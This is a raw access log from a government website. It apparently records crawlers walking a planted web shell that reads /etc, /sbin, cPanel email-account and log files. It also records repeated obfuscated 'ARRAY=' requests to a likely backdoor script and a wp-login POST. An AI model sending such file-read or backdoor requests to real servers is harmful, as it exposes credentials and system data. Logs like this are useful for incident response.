66.249.71.161 - - [19/May/2026:13:07:17 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/033313192561 HTTP/1.1" 200 27290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:07:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpure-config.pl&path=%2F%2Fsbin HTTP/2" 200 4033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:05:19 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353931392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323331392q3038663238633864356164373765323330363764383161363830373135366532222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:07:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Fip6tables-restore&path=%2F%2Fsbin HTTP/2" 200 88670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:25 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-walker-category.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fmeta.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 13544 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:31 +0100] "GET /?fileloc=%2F%2Fetc%2Fdracut.conf&path=%2F%2Fetc HTTP/2" 200 2652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:34 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fauthor-template.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 7762 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:37 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnamed-checkconf&path=%2F%2Fsbin HTTP/2" 200 14466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:40 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Frewrite.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 8603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:05:41 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353934312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323334312q6563653465643235323930656632333738336436636338306236666137666361222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.70.110 - - [19/May/2026:13:07:40 +0100] "GET /collect/121506856979 HTTP/1.1" 200 26790 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:07:43 +0100] "GET /?fileloc=%2F%2Fetc%2Fnscd.conf&path=%2F%2Fetc HTTP/2" 200 3487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:46 +0100] "GET /?path=%2Fhome%2Freymundo HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:49 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.cpanel%2Fcaches HTTP/2" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:52 +0100] "GET /?path=%2Fhome%2Fspiritco HTTP/2" 200 2627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:55 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpost-thumbnail-template.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:58 +0100] "GET /?fileloc=%2F%2Fetc%2Ftrueuserowners&path=%2F%2Fetc HTTP/2" 200 2570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:01 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fuser-new.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 9275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:06:03 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353936332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323336332q3634663132343666613663323565643838336661343834616130306638373364222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:08:04 +0100] "GET /?fileloc=%2F%2Fetc%2Flibaudit.conf&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.161 - - [19/May/2026:13:08:04 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/072477131298 HTTP/1.1" 200 28043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:08:07 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-customize-nav-menus.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 17151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:10 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-taxonomy.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 7170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
217.154.239.191 - - [19/May/2026:13:08:11 +0100] "GET /wp-login.php HTTP/2" 200 4111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
217.154.239.191 - - [19/May/2026:13:08:11 +0100] "POST /wp-login.php HTTP/2" 200 4111 "https://plandept.nc.gov.lk/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.217.176 - - [19/May/2026:13:08:13 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Frss.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 9461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:16 +0100] "GET /?fileloc=%2F%2Fsbin%2Fquotacheck&path=%2F%2Fsbin HTTP/2" 200 39849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:19 +0100] "GET /?fileloc=%2F%2Fetc%2Fmotd&path=%2F%2Fetc HTTP/2" 200 2563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:22 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fadmin-footer.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 3673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:25 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fsitemaps.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:06:25 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353938352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323338352q3935303662373366643633663862636435313461363130353364643834333566222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.71.174 - - [19/May/2026:13:08:26 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/073941959096 HTTP/1.1" 200 26902 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:08:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fnav-menu-template.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 9019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:31 +0100] "GET /?fileloc=%2F%2Fsbin%2Fip6tables-nft-save&path=%2F%2Fsbin HTTP/2" 200 88671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:34 +0100] "GET /?fileloc=%2F%2Fetc%2Faliases&path=%2F%2Fetc HTTP/2" 200 3254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:37 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fbookmark.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 6959 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:43 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Flogs%2Fplandept.nc.gov.lk-May-2026.gz&path=%2Fhome%2Fplandeptncgov%2Flogs HTTP/2" 200 57398 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:45 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Flogs%2Fplandept.nc.gov.lk-ssl_log-May-2026.gz&path=%2Fhome%2Fplandeptncgov%2Flogs HTTP/2" 200 1505240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:06:47 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139363030372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323430372q3566363932313163656561636631663830353562666138666336666663653335222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:08:48 +0100] "GET /?fileloc=%2F%2Fhome%2Fcpmove-dxbfilms.tar.gz.part00001&path=%2F%2Fhome HTTP/2" 200 2583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:13:08:49 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/073918639648 HTTP/1.1" 200 26377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:08:51 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2F.cpanel%2Femail_accounts.json&path=%2Fhome%2Fplandeptncgov%2F.cpanel HTTP/2" 200 2593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:54 +0100] "GET /?fileloc=%2F%2Fetc%2Flocaldomains.rpmnew&path=%2F%2Fetc HTTP/2" 200 2572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:08:57 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2F.cpanel%2FCpanel_SSL_DCV_DNS_Mutex&path=%2Fhome%2Fplandeptncgov%2F.cpanel HTTP/2" 200 2599 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:00 +0100] "GET /?fileloc=%2F%2Fhome%2F0_README_BEFORE_DELETING_VIRTFS&path=%2F%2Fhome HTTP/2" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:03 +0100] "GET /?fileloc=%2F%2Fetc%2Feximrejects.rpmorig&path=%2F%2Fetc HTTP/2" 200 2746 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:06 +0100] "GET /?fileloc=%2F%2Fetc%2Fblocked_incoming_email_country_ips&path=%2F%2Fetc HTTP/2" 200 2585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:09 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxtables-monitor&path=%2F%2Fsbin HTTP/2" 200 88667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:07:09 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139363032392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323432392q3166666532376364633537376339333132383364306334333436616635646664222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:09:12 +0100] "GET /?path=%2F%2Fhome%2Fchromium1pvtwecopya20260123155555ZMw HTTP/2" 200 2646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.160 - - [19/May/2026:13:09:12 +0100] "GET /view/item/17838691864 HTTP/1.1" 200 27521 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:09:15 +0100] "GET /?fileloc=%2F%2Fetc%2Fblocked_incoming_email_domains&path=%2F%2Fetc HTTP/2" 200 2580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:18 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n HTTP/2" 200 2712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:21 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n%2Fclass-wp-translations.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n HTTP/2" 200 3743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:24 +0100] "GET /?fileloc=%2F%2Fetc%2Fnamed.conf.rebuilddnsconfig&path=%2F%2Fetc HTTP/2" 200 3963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:27 +0100] "GET /?fileloc=%2F%2Fetc%2FDIR_COLORS.lightbgcolor&path=%2F%2Fetc HTTP/2" 200 4671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:30 +0100] "GET /?fileloc=%2F%2Fetc%2Fnamed.conf.prerebuilddnsconfig&path=%2F%2Fetc HTTP/2" 200 3965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.243 - - [19/May/2026:13:09:29 +0100] "GET /en/downloads.html HTTP/2" 200 27265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.79.186.0 - - [19/May/2026:13:07:32 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139363035322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323435322q6666626332363132386639316137633931306466626261346464333162353163222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:09:33 +0100] "GET /?fileloc=%2F%2Fhome%2Flatest&path=%2F%2Fhome HTTP/2" 200 60214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:36 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2F.cpanel%2Fnvdata.cache&path=%2Fhome%2Fplandeptncgov%2F.cpanel HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:13:09:35 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/071266048323 HTTP/1.1" 200 26976 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:09:39 +0100] "GET /?fileloc=%2F%2Fetc%2Ffavicon.png&path=%2F%2Fetc HTTP/2" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:42 +0100] "GET /?fileloc=%2F%2Fetc%2Fnamed.rfc1912.zones&path=%2F%2Fetc HTTP/2" 200 2574 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:47 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FText%2FException.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FText HTTP/2" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:49 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.koality HTTP/2" 200 2633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:52 +0100] "GET /?path=%2F%2Fhome%2Fsweetvibes HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:07:54 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139363037342p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323437342q6461336361356262363863343366343930363230303534613638666166316633222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:09:55 +0100] "GET /?path=%2F%2Fhome%2Fturbotec HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:09:58 +0100] "GET /?path=%2F%2Fhome%2Fpearlbow HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:01 +0100] "GET /?fileloc=%2F%2Fsbin%2Fvpddecode&path=%2F%2Fsbin HTTP/2" 200 8224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:04 +0100] "GET /?fileloc=%2F%2Fsbin%2Febtables&path=%2F%2Fsbin HTTP/2" 200 88660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:07 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgrub2-set-bootflag&path=%2F%2Fsbin HTTP/2" 200 7029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:10 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgrpconv&path=%2F%2Fsbin HTTP/2" 200 19682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:13 +0100] "GET /?path=%2F%2Fetc%2Fyum.repos.d HTTP/2" 200 3846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:10:16 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables&path=%2F%2Fsbin HTTP/2" 200 88660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:08:17 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139363039372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323439372q3763386564363331633664313833326631306637363066393037636437323833222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:10:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexportfs&path=%2F%2Fsbin HTTP/2" 200 28750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
